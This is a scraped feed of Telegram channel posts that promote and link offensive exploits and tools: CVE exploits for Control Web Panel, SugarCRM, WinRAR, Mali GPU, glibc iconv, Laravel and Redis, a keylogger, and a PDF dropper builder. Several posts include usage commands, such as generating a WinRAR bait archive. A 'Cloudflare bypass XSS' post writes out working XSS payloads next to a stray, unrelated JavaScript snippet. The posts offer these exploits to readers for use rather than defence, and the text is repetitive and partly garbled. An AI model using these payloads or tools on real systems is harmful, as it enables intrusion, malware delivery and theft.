Control-Web-Panel.txt
3.8 KB
Control Web Panel Unauthenticated Remote Command Execution Exploit
➖ Category: remote exploits
🖥 Platform: linux
🪖 Risk: Security Risk Critical 🚨
🗂️ Size: 🅰 🅰 🅰 📝 📝
📝
Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.
⭐ CVE: CVE-2022-44877
#CVE #Linux #Exploit
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 T.me/MRvirusIRBOT
📢 T.me/SashClient
🪩 Https://discord.gg/UfFvDYBBMM
🌐 Https://sash.mybin.ir
Description: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.
#CVE #Linux #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Exploits bank of NMAP program
🔗 Link
#Nmap #Vuln #Exploit
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
#Nmap #Vuln #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Post exploitation tools:
➕ Vegile — Ghost In The Shell:
😸 GitHub
➕ Chrome Keylogger:
😸 GitHub
➕ Forensic tools
➕ Autopsy:
😸 GitHub
➕ Wireshark:
🌐 Site
➕ Bulk extractor:
😸 GitHub
➕ Disk Clone and ISO Image Aquire:
🌐 Site
➕ Toolsley:
🌐 SIte
#RootKit #Keylogger #Exploit #Tools
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
#RootKit #Keylogger #Exploit #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
SugarCRM 12.x Remote Code Execution / Shell Upload Exploit
Category: remote exploits
Platform: php
Risk: [Security Risk Critical]
Description:
This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.
CVE: 2023-22952
Download
#CVE #Exploit #Rc #Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Category: remote exploits
Platform: php
Risk: [Security Risk Critical]
Description:
This Metasploit module exploits CVE-2023-22952, a remote code execution vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2.
CVE: 2023-22952
Download
#CVE #Exploit #Rc #Shell
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Microsoft Windows 11 - 'cmd.exe' Denial of Service
Platform: Windows
Type: dos
Exploit-db
Dwonload
#Windows #Exploit #Python
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Platform: Windows
Type: dos
Exploit-db
Dwonload
#Windows #Exploit #Python
➖➖➖➖➖➖➖➖➖➖
👤 T.me/MRvirusIRBOT
📢 T.me/BugCod3
Marijuana Exploit 🍀
⬇️ Download
🔒
#Exploit #Bot
➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗ ➗
🔥 👤 T.me/BugCod3
📢 T.me/LearnExploit
@LearnExploit#Exploit #Bot
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
Generate the default poc for test
python cve-2023-38831-exp-gen.py poc
or
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
python cve-2023-38831-exp-gen.py <bait name> <script name> <output name>
to generate your exploit
BugCod3#CVE #Winrar #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡1👍1 1
This tool serves to find the original IP behind websites that have been protected by CloudFlare, the information generated can be useful for further penetration. The information generated by this tool is as follows.
This tool is made with PHP code with very simple programming using several APIs to get maximum results, but this tool does not guarantee 100% to be able to bypass websites that have been protected by CloudFlare. Some websites sometimes cannot be detected by their original IP.
sudo apt install php-curl
cd CloudPeler
./crimeflare.php exemple.com
BugCod3#Cloudflare #Bypass #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4 2⚡1👍1🥰1
This media is not supported in your browser
VIEW IN TELEGRAM
Run Script with Python 2.7
python -m pip install requests
python -m pip install bs4
python -m pip install colorama
python -m pip install lxml
@LearnExploit#Exploit #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
Cloudflare bypass XSS payloads
Tested On:👩💻
XSS Payloads:
#Exploit #XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Tested On:
XSS Payloads:
for(t?c.outerHTmL=o:i=o=’’;i++<1024;o+=`<code onclick=this.innerHTmL=’${M(i)?’*’:n||’·’}’>#</code>${i%64?’’:’<p>’}`)for(n=j=0;j<9;n+=M(i-65+j%3+(j++/3|0)*64))M=i=>i>64&i<960&i%64>1&C(i*i)>.7
javascript:{alert ‘0’ }
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
<svg/OnLoad="`${prompt``}`">#Exploit #XSS #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3 3⚡2❤2
The useful exploit finder
SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.
SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.
pip install -r requirements.txt
python sicat.py --help
From keyword:
python sicat -k telerik --exploitdb --msfmodule
From nmap output:
nmap -sV localhost -oX nmap_out | python sicat -nm --packetstorm
BugCod3#Exploit #Metasploit #Finder
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1👍1🔥1🐳1
POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).
Put your exe-link and build the PDF-FILE
BugCod3#C #PDF #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3🔥3❤2👎2
Mali GPU Kernel LPE
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
Pixel 7 Pro:
Pixel 7 Pro:
Pixel 7:
Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the
Github
⬇️ Download
🔓
#C #Exploit #Android #Kernel #Pixel
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
google/husky/husky:14/UD1A.231105.004/11010374:user/release-keysPixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keysPixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keysPixel 7:
google/panther/panther:14/UP1A.231105.003/11010452:user/release-keysVulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the
gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.Github
⬇️ Download
🔓
BugCod3#C #Exploit #Android #Kernel #Pixel
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
❤1⚡1👍1🔥1
CNEXT exploits
💬
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()
👁🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:
⚪️ Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...
🗝 Exploits:
Exploits will become available as blogposts come out.
⚪️ CNEXT: file read to RCE exploit
⚪️ To be continued...
😸 Github
⬇️ Download
🔒
#CVE #Exploit #Cnext
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()
The vulnerability and exploits are described in the following blogposts:
Exploits will become available as blogposts come out.
BugCod3#CVE #Exploit #Cnext
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1
Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path
Exploit Author: Ex3ptionaL
Exploit Date: 2024-04-01
Vendor:
Version:
Tested on OS: Microsoft Windows 10 pro x64
🕷 Exploit-db
⬇️ Download
#Exploit #ESET #NOD32
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LernExploit
📣 T.me/A3l3_KA4
Exploit Author: Ex3ptionaL
Exploit Date: 2024-04-01
Vendor:
https://www.eset.comVersion:
17.0.16.0Tested on OS: Microsoft Windows 10 pro x64
#Exploit #ESET #NOD32
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2⚡2👎2🔥2👍1
WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability
📊 Category: web applications
💻 Platform: php
🪖 Risk: Security Risk High 🚨
💬
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.
🔥 CVE: CVE-2025-25163
⬇️ Download
🔒
#CVE #Exploit #PHP #WordPress
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.
BugCod3#CVE #Exploit #PHP #WordPress
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5❤4👍3🔥3
Laravel RCE Exploitation Toolkit 🤕
Purpose: Exploits Laravel RCE vulnerability by using a known APP_KEY to generate a malicious payload that leads to remote code execution. If successful, it writes a backdoor to the server and logs the URL⭐
💻 Github
#Exploit #laravel #Rce #Rcr_Exploit
Join Exploit Forge✈️
Join Exploit Forge Forum✈️
Join BugCod3✈️
Purpose: Exploits Laravel RCE vulnerability by using a known APP_KEY to generate a malicious payload that leads to remote code execution. If successful, it writes a backdoor to the server and logs the URL
#Exploit #laravel #Rce #Rcr_Exploit
Join Exploit Forge
Join Exploit Forge Forum
Join BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5⚡4❤1
CVE-2025-24893 🤔
is a critical unauthenticated remote code execution (RCE) vulnerability affecting the XWiki Platform🩷
Summary❗
Affected Versions❓
XWiki🤔 5.3-milestone-2 up to < 15.10.11 🦠
XWiki🤔 16.0.0-rc-1 up to < 16.4.1 🦠
CVSS v3.1 Score : 9.8 (Critical)🔫
Github🌐
#Rce #Exploit
Join Exploit Forge💎
Join Exploit Forge Forum💎
Join BugCod3💎
is a critical unauthenticated remote code execution (RCE) vulnerability affecting the XWiki Platform
Summary
Affected Versions
XWiki
XWiki
CVSS v3.1 Score : 9.8 (Critical)
Github
#Rce #Exploit
Join Exploit Forge
Join Exploit Forge Forum
Join BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6⚡4❤1👍1💋1
[webapps] Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
🔗 Read more
#BugCod3 #security #bugbounty #infosec #exploitdb #exploit #poc
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
🔗 Read more
#BugCod3 #security #bugbounty #infosec #exploitdb #exploit #poc
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
🔥3❤🔥1❤1
Researchers discovered a critical Redis vulnerability called RediShell 🗡
(CVE-2025-49844) a CVSS 10 remote code execution flaw affecting all Redis versions. It allows attackers to send a malicious Lua script, escape the sandbox, and execute code on the host. Around 330,000 Redis instances are exposed online, 60,000 of them without authentication, and over 75% of cloud environments use Redis⚡️
CVE-2025-49844 (RediShell) POC🛡
Github
#cve #poc #exploit #redishell #redis
Join Exploit Forge🔝
Join Exploit Forge Forum👑
Join BugCod3🤝
(CVE-2025-49844) a CVSS 10 remote code execution flaw affecting all Redis versions. It allows attackers to send a malicious Lua script, escape the sandbox, and execute code on the host. Around 330,000 Redis instances are exposed online, 60,000 of them without authentication, and over 75% of cloud environments use Redis
CVE-2025-49844 (RediShell) POC
Github
#cve #poc #exploit #redishell #redis
Join Exploit Forge
Join Exploit Forge Forum
Join BugCod3
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤2❤🔥2⚡1